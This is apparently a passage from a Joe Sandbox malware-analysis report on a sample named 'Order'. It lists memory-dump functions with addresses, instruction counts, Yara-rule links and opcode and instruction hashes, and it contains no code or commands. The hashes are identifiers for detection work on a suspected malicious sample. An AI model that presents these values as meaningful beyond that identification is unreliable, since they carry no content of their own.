                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3b64dd40b146ebd80e5cbc123509030905a76d021a2b0108399ce503568047ef
                                                                                                                                    • Instruction ID: c64369102f4393918065aea6d869ac85f7eeaf8094b8bf8bdec162e0ff87aec1
                                                                                                                                    • Opcode Fuzzy Hash: 3b64dd40b146ebd80e5cbc123509030905a76d021a2b0108399ce503568047ef
                                                                                                                                    • Instruction Fuzzy Hash: AA118F76A01745EFDB25CF59C980E5AFBF8AF94690F154079E90DAB311E630DE01CB90
                                                                                                                                    Function 01A0A8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                    • Instruction ID: 0b14520fa25f6784c7cfc42d10c47703e7112fe77269d9a3bac371221dfd6784
                                                                                                                                    • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                    • Instruction Fuzzy Hash: F211C836A00915AFDB19CB54C805B9EB7F5EF84350F054269EC55D7380D675BE51CB80
                                                                                                                                    Function 01940AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                    • Instruction ID: faea5ecb57f0832c5b0400911b5e9c48aeb118fe971caca3360e107903b24953
                                                                                                                                    • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                    • Instruction Fuzzy Hash: 852106B5A00B459FD3A0CF29C440B56BBF4FB48B10F10492EE98AC7B50E371E814CB94
                                                                                                                                    Function 019CE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                    • Instruction ID: ead17cc3da2ce12dfecde30c5b7bbcceb93f5f6e341b10a34a7b4ba710d7485a
                                                                                                                                    • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                    • Instruction Fuzzy Hash: 11119131601601EFE7219F48C840F5B7FA9EB85F55F05842CEA8E9B260D731DC40D792
                                                                                                                                    Function 019627ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 714de6a45a8f861efedd6dfbc35b8c8d7e80726c9b6dac57b8734ef2e3f20a82
                                                                                                                                    • Instruction ID: 78f3cb7375e4b5788049093f832f992c38a11bde649e43016bf71d18f78144f6
                                                                                                                                    • Opcode Fuzzy Hash: 714de6a45a8f861efedd6dfbc35b8c8d7e80726c9b6dac57b8734ef2e3f20a82
                                                                                                                                    • Instruction Fuzzy Hash: 0D010031606686ABE326A36E9C88F277B9CEF80795F490065F9099B240DA24DC00C2F2
                                                                                                                                    Function 01944690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2be48140b5689a0c2cdb69a40a3d7916ad1ced68a6e44b69356f4f896214a9c0
                                                                                                                                    • Instruction ID: 954046ef489533b7a18abc990601b028c22e3d5255dec1f3522db40d15bf77aa
                                                                                                                                    • Opcode Fuzzy Hash: 2be48140b5689a0c2cdb69a40a3d7916ad1ced68a6e44b69356f4f896214a9c0
                                                                                                                                    • Instruction Fuzzy Hash: B611E136241645AFDB26CF5DD940F567BA8EB86B69F00452AFA0C9B350C370E842CF60
                                                                                                                                    Function 01A14B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6146b08f30c4172be9c0d246f6bc82299867c95a2d3a34ce3a6b50e3189b848b
                                                                                                                                    • Instruction ID: 3251c236f2d6ed02fca926e91955ebd4c399bc9b6eab8e09afb3bf5df2b69aaf
                                                                                                                                    • Opcode Fuzzy Hash: 6146b08f30c4172be9c0d246f6bc82299867c95a2d3a34ce3a6b50e3189b848b
                                                                                                                                    • Instruction Fuzzy Hash: E711C2362046119FD722DB6DD840F67B7AAFFC8711F194429EA8687698DB30A802CB90
                                                                                                                                    Function 01976620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ef809955d45d00df8172a44b10f02a1ff1dbd0dabc834b6de26ad34b3ccda471
                                                                                                                                    • Instruction ID: b98cbc43063eff84bbfb695cf08662333e6af1f0f30dd029040ed4c7b9d49c78
                                                                                                                                    • Opcode Fuzzy Hash: ef809955d45d00df8172a44b10f02a1ff1dbd0dabc834b6de26ad34b3ccda471
                                                                                                                                    • Instruction Fuzzy Hash: 31118676900B15ABEB21EF59D980F5EFBB8EF84751F910459DA09B7200D730AD018B50
                                                                                                                                    Function 0196EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7db126b229a20cd62b23421d96bfe7fce9feb06d757db513cc199909dc2e9d44
                                                                                                                                    • Instruction ID: 9a974ac936701a12eca98892502c3d9a162f5f980f1f563117280884a7aed91b
                                                                                                                                    • Opcode Fuzzy Hash: 7db126b229a20cd62b23421d96bfe7fce9feb06d757db513cc199909dc2e9d44
                                                                                                                                    • Instruction Fuzzy Hash: D20180799001099FD725DB1DD848F26BBEDEBD5319F20816AF1098B260C770DC46CBA0
                                                                                                                                    Function 0196E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                    • Instruction ID: e879119dc33f8b7d0c383b9852558e82c2be802e6910b74b57a3aec2feeb907b
                                                                                                                                    • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                    • Instruction Fuzzy Hash: 0211E9752016C59BEB23D71CC554B6977ACEB80785F1904A1ED4D97652F328C946C3A0
                                                                                                                                    Function 019CE75D Relevance: .1, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                    • Instruction ID: e44cb300303c143574b56687ca1c83ca5883a90b9092a7fe734b8a65ae1199fe
                                                                                                                                    • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                    • Instruction Fuzzy Hash: 06019232600105AFEB21DF58C801F5A7EADEB85F55F058428EA8E9B260E771DD40C791
                                                                                                                                    Function 0193A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                    • Instruction ID: 336f968d334e7c174b103cbf450c9e139d0c7ad0e04432fe3107af0f114cebe2
                                                                                                                                    • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                    • Instruction Fuzzy Hash: 4A0126354047219BCB318F19D840A367BE9EF957617008A2DFCDDCB281C335D400CB60
                                                                                                                                    Function 01A14940 Relevance: .1, Instructions: 52COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2a5ecb150f5c0b4800bbeb5eff92be771befbed2ed7a1d7d54102e2d3f7b0626
                                                                                                                                    • Instruction ID: d6d1418708de1b70db753fdab3d5f67907b0ecbac7a77bc599348300f393cbf1
                                                                                                                                    • Opcode Fuzzy Hash: 2a5ecb150f5c0b4800bbeb5eff92be771befbed2ed7a1d7d54102e2d3f7b0626
                                                                                                                                    • Instruction Fuzzy Hash: C501F5725416019FC332DF1CDC40E12BBAAEB99770B294265E9A9DB1EAE730DC01CBD0
                                                                                                                                    Function 019BE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fb380a067ff911a02bb146fc96abe1cd03c0ca0b304092f886953e22101ceccd
                                                                                                                                    • Instruction ID: 867c23b1a6d9a3d0c649edcbbefe004c83816d47a25a5b1d6e5b9c5557c921dc
                                                                                                                                    • Opcode Fuzzy Hash: fb380a067ff911a02bb146fc96abe1cd03c0ca0b304092f886953e22101ceccd
                                                                                                                                    • Instruction Fuzzy Hash: AE11A132241241EFDB15EF19CD80F967BB8FF94B44F200065FD099B651C235ED01CA90
                                                                                                                                    Function 01946259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 33a9137d96746aaca1b09f3a7134da7b466747de9e7f01643222d1dbf6fa2e20
                                                                                                                                    • Instruction ID: 708f414abb5001640cec628ab9a8499b469ed7109f31e838c1e7d326cb9cb90c
                                                                                                                                    • Opcode Fuzzy Hash: 33a9137d96746aaca1b09f3a7134da7b466747de9e7f01643222d1dbf6fa2e20
                                                                                                                                    • Instruction Fuzzy Hash: 7D115A71642229ABDB25EF64CC42FE9B3B8AF45710F504194A31CA60E0DB709E81CF84
                                                                                                                                    Function 0194208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                    • Instruction ID: 337d075bc42a86ef28265486efca6e8e36c51f94658fb2a95110357959946c45
                                                                                                                                    • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                    • Instruction Fuzzy Hash: 0701F5326002008BEF159B1DE880F92BBAABFD4700F1545A5FD09CF246EA71C881C390
                                                                                                                                    Function 019C6050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a206224dd59282bae84e2c6553b52cf7a427ef4b78431a4d49668473f5ab16bf
                                                                                                                                    • Instruction ID: 3d8b79b30d392473f98b0a2e418ea8c7e84748c75b3ec5f5e76320a42d716fc4
                                                                                                                                    • Opcode Fuzzy Hash: a206224dd59282bae84e2c6553b52cf7a427ef4b78431a4d49668473f5ab16bf
                                                                                                                                    • Instruction Fuzzy Hash: 22112D77900019BBCB11DB95CC84DDF7B7CEF48254F044166E90AE7211EA34EA15CBE1
                                                                                                                                    Function 019D6500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 13395eeb40c37b6aedb0dd1d8cf82932622f69474ffcc57d5c5b0c311f514432
                                                                                                                                    • Instruction ID: 25d678d61562f717d2dc255dee6ae8a0d2348938c08e974405b7259130b90477
                                                                                                                                    • Opcode Fuzzy Hash: 13395eeb40c37b6aedb0dd1d8cf82932622f69474ffcc57d5c5b0c311f514432
                                                                                                                                    • Instruction Fuzzy Hash: 2711A1366441469FD711CF58D800BA6BBB9FB9A314F48C159E8498B316D732EC85CBA0
                                                                                                                                    Function 019CC810 Relevance: .0, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 87b46a42ce149f89b3bd5266660506c98e2f45e61e630bdc3b1be74b9fcfd0b2
                                                                                                                                    • Instruction ID: cbb3468cf1a915b969803ae0ecf84e3bdd2d3ee729343a25b775d9f1e11c4017
                                                                                                                                    • Opcode Fuzzy Hash: 87b46a42ce149f89b3bd5266660506c98e2f45e61e630bdc3b1be74b9fcfd0b2
                                                                                                                                    • Instruction Fuzzy Hash: 3B11E8B1E002199BCB04DFA9D541AAEBBF8FF58750F10406AB909E7351D674EA018BA5
                                                                                                                                    Function 019820F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ecdbbeddb31829f24135fd366bd93297aa2a1d8e0c4279f67f4d832513210586
                                                                                                                                    • Instruction ID: f1bca5e9684f6494c5fc096fcf398c49ee279f3f6534ea1f51fbdf86e98d9deb
                                                                                                                                    • Opcode Fuzzy Hash: ecdbbeddb31829f24135fd366bd93297aa2a1d8e0c4279f67f4d832513210586
                                                                                                                                    • Instruction Fuzzy Hash: 19118075A0120DAFCB05EFA4C851FAE7BBAFF84740F104059F90A97290E635EE11CB90
                                                                                                                                    Function 0193C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                    • Instruction ID: 9eccc6d3b3a8f41f71e771598f2598506285ad89debea7cf5b17bf331cba8d8c
                                                                                                                                    • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                    • Instruction Fuzzy Hash: 7801F932100B459FEF229AAEC440E67B7EDFFC5350F04481AA59A87544DA70F401C761
                                                                                                                                    Function 0197E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9be260a2f88bfc0d41a9e6464c7883909d24d1959ec92cbbb742e9fce7e08d0c
                                                                                                                                    • Instruction ID: 24a2566cfa9be89d686330d3763857134a1cf1361cd69985a449a1018f9aed09
                                                                                                                                    • Opcode Fuzzy Hash: 9be260a2f88bfc0d41a9e6464c7883909d24d1959ec92cbbb742e9fce7e08d0c
                                                                                                                                    • Instruction Fuzzy Hash: E60184B1611505BFD351AB69CD80E57BBACFFD9694B000525BA0D93551DB24EC01C7A0
                                                                                                                                    Function 019D69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7cffd14ed4b167bc85b17382951473674ae96415f7e048a2bae4c27fa6f37e4f
                                                                                                                                    • Instruction ID: 0105587dddefa0b662c27f91e301705c4fcd12b0e5aa83aec72b9c6989dbef69
                                                                                                                                    • Opcode Fuzzy Hash: 7cffd14ed4b167bc85b17382951473674ae96415f7e048a2bae4c27fa6f37e4f
                                                                                                                                    • Instruction Fuzzy Hash: B401FC322142129BD320EF6AC849AA7BBACFF98760F118529F99D87180E730D905C7D2
                                                                                                                                    Function 019CC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 966c338b9cb44bfc548fef3f1ef8f78fba50554016d4fb0815d1739842ca639f
                                                                                                                                    • Instruction ID: 8c4bb705253a7d85c6d4aa51cc70eb78808490e2cd3b13bab723b5a60bda5bae
                                                                                                                                    • Opcode Fuzzy Hash: 966c338b9cb44bfc548fef3f1ef8f78fba50554016d4fb0815d1739842ca639f
                                                                                                                                    • Instruction Fuzzy Hash: 0E115E75A0020DABDB15EF64C851EAEBBB9EF88B40F008059FD4997380DA34D911CB91
                                                                                                                                    Function 019CC97C Relevance: .0, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ffef37f68ba1582d156bdd6fd3d5107b95b8217b6ebea17c3d3f93ef0dc81a16
                                                                                                                                    • Instruction ID: d01633377ee78054c6a12a9860e5c95fa96a8f766ffa5a3d677ec610243b0f83
                                                                                                                                    • Opcode Fuzzy Hash: ffef37f68ba1582d156bdd6fd3d5107b95b8217b6ebea17c3d3f93ef0dc81a16
                                                                                                                                    • Instruction Fuzzy Hash: 9A1139B16183099FC700DF69D442A9BBBE8EF98750F00491EB998D7391E630E901CBA2
                                                                                                                                    Function 01A14A80 Relevance: .0, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                    • Instruction ID: b5e4061fd305c04a3e3c086df77e8cf942c399a4866e0f8845671f7a3d352b88
                                                                                                                                    • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                    • Instruction Fuzzy Hash: 5301D433200A059FE721DB6DD844F96BBEAFBCA710F094819E6428B658DBB0F841C794
                                                                                                                                    Function 019CCA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bf246d0ecdc3a980b4f892c5629a6ae2afaf550c58f7186235b8d48580784927
                                                                                                                                    • Instruction ID: cb83ad54686fffd86b053fff58f268a4b20c3bee04b4bbe4a011d6b97ad135d3
                                                                                                                                    • Opcode Fuzzy Hash: bf246d0ecdc3a980b4f892c5629a6ae2afaf550c58f7186235b8d48580784927
                                                                                                                                    • Instruction Fuzzy Hash: B1113C716143059FC710DF6DD445A5BBBE8FF99750F00451EB998D7350E630E901CB96
                                                                                                                                    Function 0195E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                    • Instruction ID: ba6e7a79d3f11e12ed9b69f61eeee777aeb4ab0531c5cb28a5872024a3e25f22
                                                                                                                                    • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                    • Instruction Fuzzy Hash: 39017C32204580DFE722CA2DC948F36BBECEB84755F0904A5F90DDB691D629DE40C721
                                                                                                                                    Function 0193826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
